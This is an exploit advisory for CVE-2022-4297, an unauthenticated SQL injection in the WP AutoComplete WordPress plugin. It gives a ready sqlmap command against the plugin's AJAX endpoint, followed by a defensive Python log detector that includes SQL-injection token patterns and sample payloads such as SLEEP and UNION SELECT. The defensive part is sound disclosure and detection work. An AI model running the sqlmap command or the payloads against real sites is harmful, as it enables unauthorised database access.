## https://sploitus.com/exploit?id=PACKETSTORM:173293
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi  
# Date: 30/06/2023  
# Exploit Author: Matin nouriyan (matitanium)  
# Version: <= 1.0.4  
# CVE: CVE-2022-4297  
# Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/  
# Tested on: Kali Linux  
  
---------------------------------------  
  
  
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise  
and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users,  
leading to an unauthenticated SQL injection.  
  
--------------------------------------  
  
How to Reproduce this Vulnerability:  
  
1. Install WP AutoComplete <= 1.0.4   
2. WP AutoComplete <= 1.0.4 uses the q parameter for AJAX requests  
3. Find requests that belong to WP AutoComplete, like the one in step 5  
4. Start sqlmap and exploit   
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000&timestamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q
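
For defenders, the request in step 5 gives a concrete log signature: the wi_get_search_results action on admin-ajax.php with SQL syntax in the q parameter. The Python below is an added example, not part of the original advisory; it assumes Combined Log Format access logs and a heuristic token list, and its sample log lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Path, action and parameter names come from the request shown in step 5.
AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "wi_get_search_results"
PARAM = "q"
# Assumption: tokens that rarely appear in a genuine search term. Tune per site.
SQL_TOKENS = re.compile(
    r"'|\"|--|#|/\*|;|\b(?:union|select|sleep|benchmark|information_schema)\b",
    re.IGNORECASE)
# Assumption: Combined Log Format, as written by default Apache/nginx setups.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "\S+ (?P<target>\S+) [^"]*" \d{3}')

def suspicious_requests(lines):
    """Return (ip, time, decoded q) for plugin AJAX requests whose q looks like SQL."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path != AJAX_PATH:
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
        if ACTION not in params.get("action", []):
            continue
        hits += [(m.group("ip"), m.group("time"), v)
                 for v in params.get(PARAM, []) if SQL_TOKENS.search(v)]
    return hits

def hits_per_ip(hits):
    """Count flagged requests per client address to surface automated scanning."""
    return Counter(ip for ip, _, _ in hits)

# Constructed sample lines: documentation IP ranges, placeholder nonce value.
def _line(ip, sec, q, action=ACTION):
    return (f'{ip} - - [30/Jun/2023:10:00:{sec:02d} +0000] "GET {AJAX_PATH}?q={q}'
            f'&Limit=1000&action={action}&security=NONCE HTTP/1.1" 200 512 "-" "-"')

SAMPLE_LOG = [
    _line("203.0.113.10", 1, "shoes"),                                # normal search
    _line("198.51.100.7", 2, "shoes%27%20AND%20SLEEP%285%29--%20-"),  # flagged
    _line("198.51.100.7", 3, "1%20UNION%20SELECT%20NULL"),            # flagged
    _line("203.0.113.10", 4, "select", action="heartbeat"),           # other action
]
```

Access logs only record the query string, so the same action sent as a POST body needs a WAF or request-body audit log to be visible. Searches that legitimately contain an apostrophe will also match, so treat a hit as a lead and use the per-IP count to separate scanning from ordinary use.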